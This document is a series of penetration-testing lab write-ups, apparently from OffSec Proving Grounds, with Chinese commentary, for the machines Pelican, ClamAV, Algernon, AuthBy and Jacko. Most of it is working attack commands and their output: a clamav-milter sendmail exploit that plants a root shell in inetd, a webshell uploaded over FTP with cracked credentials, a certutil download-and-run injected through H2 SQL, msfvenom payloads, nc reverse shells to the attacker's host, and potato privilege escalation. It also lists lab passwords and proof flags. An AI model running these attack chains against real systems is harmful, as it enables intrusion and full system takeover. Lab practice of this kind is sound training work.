0x00007f971bd1c6f4 in __GI___nanosleep (requested_time=requested_time@entry=0x7ffc3d7a2c80, remaining=remaining@entry=0x7ffc3d7a2c80) at ../sysdeps/unix/sysv/linux/nanosleep.c:28
28 ../sysdeps/unix/sysv/linux/nanosleep.c: No such file or directory.
Saved corefile core.513
[Inferior 1 (process 513) detached]
charles@pelican:~$ ls
ls
core.513 local.txt
charles@pelican:~$ 用 strings core file 找到密碼 ClogKingpinInning731
Proof
charles@pelican:~$ su root
su root
Password: ClogKingpinInning731
root@pelican:/home/charles# cat /root/proof.txt
cat /root/proof.txt
4e88befdbd6acaf770aad3a9aa9a1bcaClamAV
Service Enumeration
Port Scan Results
| Server IP Address | Ports Open |
| 192.168.228.42 | TCP:22,25,80,139,199,445,6000 |
Initial Access – SNMP leak info to RCE
用 snmp-check 可以發現主機上有 clamav-milter ,查了一下發現可以 RCE
[*] Processes:
Id Status Name Path Parameters
1 runnable init init [2]
2 runnable ksoftirqd/0 ksoftirqd/0
3 runnable events/0 events/0
4 runnable khelper khelper
5 runnable kacpid kacpid
99 runnable kblockd/0 kblockd/0
109 runnable pdflush pdflush
110 runnable pdflush pdflush
111 runnable kswapd0 kswapd0
112 runnable aio/0 aio/0
255 runnable kseriod kseriod
276 runnable scsi_eh_0 scsi_eh_0
284 runnable khubd khubd
348 runnable shpchpd_event shpchpd_event
380 runnable kjournald kjournald
935 runnable vmmemctl vmmemctl
1177 runnable vmtoolsd /usr/sbin/vmtoolsd
3768 running syslogd /sbin/syslogd
3771 runnable klogd /sbin/klogd
3775 runnable clamd /usr/local/sbin/clamd
3779 runnable clamav-milter /usr/local/sbin/clamav-milter --black-hole-mode -l -o -q /var/run/clamav/clamav-milter.ctl
3788 runnable inetd /usr/sbin/inetd
3792 runnable nmbd /usr/sbin/nmbd -D
3794 runnable smbd /usr/sbin/smbd -D
3798 running snmpd /usr/sbin/snmpd -Lsd -Lf /dev/null -p /var/run/snmpd.pid
3800 runnable smbd /usr/sbin/smbd -D
3805 runnable sshd /usr/sbin/sshd
3883 runnable sendmail-mta sendmail: MTA: accepting connections
3900 runnable atd /usr/sbin/atd
3903 runnable cron /usr/sbin/cron
3910 runnable apache /usr/sbin/apache
3911 runnable apache /usr/sbin/apache
3912 runnable apache /usr/sbin/apache
3913 runnable apache /usr/sbin/apache
3914 runnable apache /usr/sbin/apache
3915 runnable apache /usr/sbin/apache
3930 runnable getty /sbin/getty 38400 tty1
3936 runnable getty /sbin/getty 38400 tty2
3937 runnable getty /sbin/getty 38400 tty3
3938 runnable getty /sbin/getty 38400 tty4
3939 runnable getty /sbin/getty 38400 tty5
3940 runnable getty /sbin/getty 38400 tty6
3997 runnable apache /usr/sbin/apache 使用 https://www.exploit-db.com/exploits/4761 RCE
┌──(kali㉿kali)-[~/oscp/pg/ClamAV]
└─$ perl 4761 192.168.228.42
Sendmail w/ clamav-milter Remote Root Exploit
Copyright (C) 2007 Eliteboy
Attacking 192.168.228.42...
220 localhost.localdomain ESMTP Sendmail 8.13.4/8.13.4/Debian-3sarge3; Sun, 8 Jun 2025 12:40:21 -0400; (No UCE/UBE) logging access from: [192.168.45.228](FAIL)-[192.168.45.228]
250-localhost.localdomain Hello [192.168.45.228], pleased to meet you
250-ENHANCEDSTATUSCODES
250-PIPELINING
250-EXPN
250-VERB
250-8BITMIME
250-SIZE
250-DSN
250-ETRN
250-DELIVERBY
250 HELP
250 2.1.0 <>... Sender ok
250 2.1.5 <nobody+"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf">... Recipient ok
250 2.1.5 <nobody+"|/etc/init.d/inetd restart">... Recipient ok
354 Enter mail, end with "." on a line by itself
250 2.0.0 558GeLVB004117 Message accepted for delivery
221 2.0.0 localhost.localdomain closing connection
┌──(kali㉿kali)-[~/oscp/pg/ClamAV]
└─$ rlwrap nc 192.168.228.42 31337
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/proof.txt
403682e06c26da0fad132f92c78aa2c4Algernon
Service Enumeration
Port Scan Results
| Server IP Address | Ports Open |
| 192.168.249.65 | TCP: 21,80,135,139,445,5040,9998,14001 …… |
Web Enumeration
在 9998 端口可以看到網站執行 SmarterMail ,查看 exploit SmarterMail 據有 RCE 漏洞
Initial Access
使用 https://www.exploit-db.com/exploits/49216 ,修改 lhost lport lhost 。
Proof
┌──(kali㉿kali)-[~/oscp/pg/Algernon]
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.228] from (UNKNOWN) [192.168.249.65] 49810
whoami
nt authority\system
PS C:\Windows\system32> type c:\users\administrator\desktop\proof.txt
fde0160c8fd8d1a2c54849555d52f034
PS C:\Windows\system32> Authby
21 (ftp) ,242 (http) ,3145 (ftp) ,3389 (rdp) port open
ftp 可以 anonymous login ,但是沒有一個文件是有權限讀的。
┌──(kali㉿kali)-[~/oscp/pg/AuthBy]
└─$ ftp anonymous@192.168.113.46
Connected to 192.168.113.46.
220 zFTPServer v6.0, build 2011-10-17 15:25 ready.
331 User name received, need password.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||2048|)
150 Opening connection for /bin/ls.
total 9680
---------- 1 root root 5610496 Oct 18 2011 zFTPServer.exe
---------- 1 root root 25 Feb 10 2011 UninstallService.bat
---------- 1 root root 4284928 Oct 18 2011 Uninstall.exe
---------- 1 root root 17 Aug 13 2011 StopService.bat
---------- 1 root root 18 Aug 13 2011 StartService.bat
---------- 1 root root 8736 Nov 09 2011 Settings.ini
dr-xr-xr-x 1 root root 512 Apr 15 18:58 log
---------- 1 root root 2275 Aug 08 2011 LICENSE.htm
---------- 1 root root 23 Feb 10 2011 InstallService.bat
dr-xr-xr-x 1 root root 512 Nov 08 2011 extensions
dr-xr-xr-x 1 root root 512 Nov 08 2011 certificates
dr-xr-xr-x 1 root root 512 Aug 03 2024 accounts
226 Closing data connection.
ftp>在 accounts 資料夾裡面,可以到看有 Offsec,anonymous,admin 這三個帳號存在。
ftp> cd accounts
250 CWD Command successful.
ftp> dir
229 Entering Extended Passive Mode (|||2049|)
150 Opening connection for /bin/ls.
total 4
dr-xr-xr-x 1 root root 512 Aug 03 2024 backup
---------- 1 root root 764 Aug 03 2024 acc[Offsec].uac
---------- 1 root root 1030 Aug 03 2024 acc[anonymous].uac
---------- 1 root root 926 Aug 03 2024 acc[admin].uac
226 Closing data connection.使用弱密碼 admin/admin 登入 ftp ,下載並查看檔案
┌──(kali㉿kali)-[~/oscp/pg/AuthBy]
└─$ ftp admin@192.168.113.46
Connected to 192.168.113.46.
220 zFTPServer v6.0, build 2011-10-17 15:25 ready.
331 User name received, need password.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||2050|)
150 Opening connection for /bin/ls.
total 3
-r--r--r-- 1 root root 76 Nov 08 2011 index.php
-r--r--r-- 1 root root 45 Nov 08 2011 .htpasswd
-r--r--r-- 1 root root 161 Nov 08 2011 .htaccess
226 Closing data connection.
ftp> ^D
221 Goodbye.
┌──(kali㉿kali)-[~/oscp/pg/AuthBy]
└─$ cat .ht* in*
AuthName "Qui e nuce nuculeum esse volt, frangit nucem!"
AuthType Basic
AuthUserFile c:\\wamp\www\.htpasswd
<Limit GET POST PUT>
Require valid-user
</Limit>offsec:$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0
<center><pre>Qui e nuce nuculeum esse volt, frangit nucem!</pre></center>根據 .htaccess 可以推測 ftp 檔案所在地,跟網站所在地是同一個路徑,爆破 hash 拿到帳密 offsec/elite ,用這組帳密成功登入,並且驗證網站顯示的文字跟 ftp 看到的是一樣。基於這個思路,上傳一個 webshell 上去 ftp ,成功 RCE。
┌──(kali㉿kali)-[~/oscp/pg/AuthBy]
└─$ ftp admin@192.168.113.46
Connected to 192.168.113.46.
220 zFTPServer v6.0, build 2011-10-17 15:25 ready.
331 User name received, need password.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put shell.php
local: shell.php remote: shell.php
229 Entering Extended Passive Mode (|||2051|)
150 File status okay; about to open data connection.
100% |********************************************************************************| 30 2.70 KiB/s 00:00 ETA
226 Closing data connection.
30 bytes sent in 00:00 (0.28 KiB/s)
ftp> ^D
221 Goodbye.
┌──(kali㉿kali)-[~/oscp/pg/AuthBy]
└─$ curl -u offsec:elite http://192.168.113.46:242/shell.php?cmd=whoami
livda\apache這台是 windows server 2008 ,沒有 powershell ,我用 msfvenom 生一個 exe ,並用 ftp 上傳上去,再透過 webshell 去執行上傳上去的 exe
剛剛 whoami 可以發現是 apache ,推測是 service account ,沒意外應該可以用馬鈴薯提權。查看擁有權限可以發現確實有 SeImpersonatePrivilege ,可以利用
┌──(kali㉿kali)-[~/oscp/pg/AuthBy]
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.234] from (UNKNOWN) [192.168.113.46] 49157
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.
C:\wamp\www>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
因為 system type 是 x86-based 所以我用的是 Juicy.Potato.x86.exe,這裡 Juicy.Potato.x86.exe,nc.exe 我用 smb 傳輸。
C:\Windows\Temp>.\Juicy.Potato.x86.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c C:\Windows\Temp\nc.exe -e cmd.exe 192.168.45.234 6969" -t *
.\Juicy.Potato.x86.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c C:\Windows\Temp\nc.exe -e cmd.exe 192.168.45.234 6969" -t *
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
....
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
C:\Windows\Temp>┌──(kali㉿kali)-[~/oscp/pg/AuthBy]
└─$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [192.168.45.234] from (UNKNOWN) [192.168.113.46] 49345
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>type C:\Users\administrator\Desktop\proof.txt
type C:\Users\administrator\Desktop\proof.txt
6652a16346292613ff24bbd7f9da8db4
C:\Windows\system32>Jacko
80,139,445,9092,8082 port open
在 8082 port 跑 H2 Database ,使用預設用戶名,及空密碼登入,並且可以執行 sql
找到 exploit ,根據 exploit 操作成功 RCE
使用 msfvenom 生一個 reverse shell payload
┌──(kali㉿kali)-[~]
└─$ msfvenom -p windows/shell_reverse_tcp lhost=192.168.45.234 lport=4444 -f exe -o tmp.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: tmp.exe
目前拿到的 shell 環境受限,很多功能都不能用 ex: dir ,使用以下 sql 語句下載 payload 到目標機器。
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("certutil -urlcache -split -f http://192.168.45.234/tmp.exe C:/Windows/Temp/tmp.exe").getInputStream()).useDelimiter("\\Z").next()');
執行起來
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("C:/Windows/Temp/tmp.exe").getInputStream()).useDelimiter("\\Z").next()');收到 rev shell 不過環境一樣是爛的
┌──(kali㉿kali)-[~/oscp/pg/Jacko]
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.234] from (UNKNOWN) [192.168.245.66] 49828
Microsoft Windows [Version 10.0.18363.836]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\H2\service>whoami
whoami
'whoami' is not recognized as an internal or external command,
operable program or batch file.用 winPEASx86.exe 發現有 SeImpersonatePrivilege
���������� Current Token privileges
� Check if you can escalate privilege using some enabled token https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#token-manipulation
SeShutdownPrivilege: DISABLED
SeChangeNotifyPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeUndockPrivilege: DISABLED
SeImpersonatePrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeCreateGlobalPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeIncreaseWorkingSetPrivilege: DISABLED
SeTimeZonePrivilege: DISABLED提權的部分我用 GodPotato-NET4.exe 搭配 msfvenom 生的 rev shell exe 無法順利執行,改用 nc.exe 才成功。這邊全部都有使用絕對路徑,因為環境沒辦法辨識 cmd 和 powershell
PS C:\Users\tony> copy \\192.168.45.234\share\GodPotato-NET4.exe .
copy \\192.168.45.234\share\GodPotato-NET4.exe .
PS C:\Users\tony> copy \\192.168.45.234\share\tmp.exe .
copy \\192.168.45.234\share\tmp.exe .
PS C:\Users\tony> copy \\192.168.45.234\share\nc.exe .
copy \\192.168.45.234\share\nc.exe .
PS C:\Users\tony> .\GodPotato-NET4.exe -cmd "C:\Windows\System32\cmd.exe /c C:\Users\tony\nc.exe -e C:\Windows\System32\cmd.exe 192.168.45.234 9999"
.\GodPotato-NET4.exe -cmd "C:\Windows\System32\cmd.exe /c C:\Users\tony\nc.exe -e C:\Windows\System32\cmd.exe 192.168.45.234 9999"
[*] CombaseModule: 0x140731985952768
[*] DispatchTable: 0x140731988295264
[*] UseProtseqFunction: 0x140731987662864
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\5de5cc0f-2eb8-40a3-b769-1274eb571149\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00004002-0534-ffff-3cd7-645c19ac732b
[*] DCOM obj OXID: 0x9f1e3f8045e72f04
[*] DCOM obj OID: 0xdad109f2dcb933a7
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 788 Token:0x772 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 864┌──(kali㉿kali)-[~]
└─$ rlwrap nc -lvnp 9999
listening on [any] 9999 ...
connect to [192.168.45.234] from (UNKNOWN) [192.168.245.66] 50202
Microsoft Windows [Version 10.0.18363.836]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
C:\Windows\system32>type C:\Users\Administrator\Desktop\proof.txt
type C:\Users\Administrator\Desktop\proof.txt
d66da0e71bd83f0769a6a0518bca75d8
C:\Windows\system32>